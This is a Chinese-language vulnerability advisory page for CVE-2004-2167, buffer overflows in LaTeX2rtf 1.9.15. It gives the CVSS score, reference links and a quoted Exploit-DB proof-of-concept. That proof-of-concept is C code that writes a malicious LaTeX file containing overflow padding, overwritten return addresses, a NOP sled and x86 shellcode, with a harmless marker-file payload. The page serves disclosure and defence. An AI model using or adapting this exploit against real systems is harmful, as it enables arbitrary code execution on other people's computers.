CVE-2004-2167
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:23
NMCOE    

[原文]Multiple buffer overflows in LaTeX2rtf 1.9.15, and possibly other versions, allow remote attackers to execute arbitrary code via (1) the expandmacro function, and possibly (2) Environments and (3) TranslateCommand.


[CNNVD]LaTeX2rtf远程缓冲区溢出漏洞(CNNVD-200412-923)

        LaTeX2rtf 1.9.15版本及可能其他的版本存在多个缓冲区溢出漏洞。远程攻击者可以借助(1)expandmacro函数,可能还有(2) Environments和(3) TranslateCommand来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2167
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2167
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-923
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17460
(UNKNOWN)  XF  latex2rtf-expandmacro-bo(17460)
http://www.securitytracker.com/alerts/2004/Sep/1011367.html
(UNKNOWN)  SECTRACK  1011367
http://www.securityfocus.com/bid/11233
(VENDOR_ADVISORY)  BID  11233
http://www.osvdb.org/displayvuln.php?osvdb_id=10216
(UNKNOWN)  OSVDB  10216
http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view=log
(UNKNOWN)  CONFIRM  http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view=log
http://xforce.iss.net/xforce/xfdb/17487
(UNKNOWN)  XF  latex2rtf-multiple-bo(17487)

- 漏洞信息

LaTeX2rtf远程缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        LaTeX2rtf 1.9.15版本及可能其他的版本存在多个缓冲区溢出漏洞。远程攻击者可以借助(1)expandmacro函数,可能还有(2) Environments和(3) TranslateCommand来执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24622)

LaTeX2rtf 1.9.15 Remote Buffer Overflow Vulnerability (EDBID:24622)
linux remote
2004-09-21 Verified
0 D. J. Bernstein
N/A [点击下载]
source: http://www.securityfocus.com/bid/11233/info

It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.

Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.

char center[] = {
  0x59                         /*   cx = *sp++                      */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0xc1, 0xe0, 0x07             /*   ax <<= 7                        */
, 0x50                         /*   *--sp = ax                 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /*   ax = 0x02563412                 */
, 0xc1, 0xe8, 0x18             /*   ax >>= 24                       */
, 0xc1, 0xe0, 0x08             /*   ax <<= 8                        */
, 0x50                         /*   *--sp = ax          512:O_CREAT */
, 0x51                         /*   *--sp = cx          "EXPLOITED" */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0xb0, 0x05                   /*   ax = (ax & ~255) + 5            */
, 0x50                         /*   *--sp = ax               5:open */
, 0xcd, 0x80                   /*   syscall                         */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x50                         /*   *--sp = ax                    0 */
, 0x40                         /*   ++ax                            */
, 0x50                         /*   *--sp = ax               1:exit */
, 0xcd, 0x80                   /*   syscall                         */
} ;

int main()
 
  int i;

  printf("\\def\\row#1{");

  for (i = 0;i < 1024;++i)
    putchar('x');
  for (i = 0;i < 6;++i) {
    /* preserve args[0] */
    putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
  }
  for (i = 0;i < 5;++i) {
    /* smasher */
    putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
  }

  for (i = 0;i < 256;++i)
    putchar(0x90);

  putchar(0xeb); putchar(sizeof(center));
  /* 0xeb 0x07   means   ip += 7 */
  /* assuming here that center has at most 255 bytes */

  for (i = 0;i < sizeof center;++i)
    putchar(center[i]);

  putchar(0xe8);
  putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
  /* 0xe8 0xf4 0xff 0xff 0xff   means   *--sp = ip; ip -= 12 */ 

  printf("EXPLOITED");

  printf("}\n");
  printf("\\begin{document}\n");
  printf("\\row a\n");
  printf("\\end{document}\n");
}		

- 漏洞信息

10216
LaTeX2rtf expandmacro() Function Overflow
Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-09-21 Unknow
2004-09-21 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站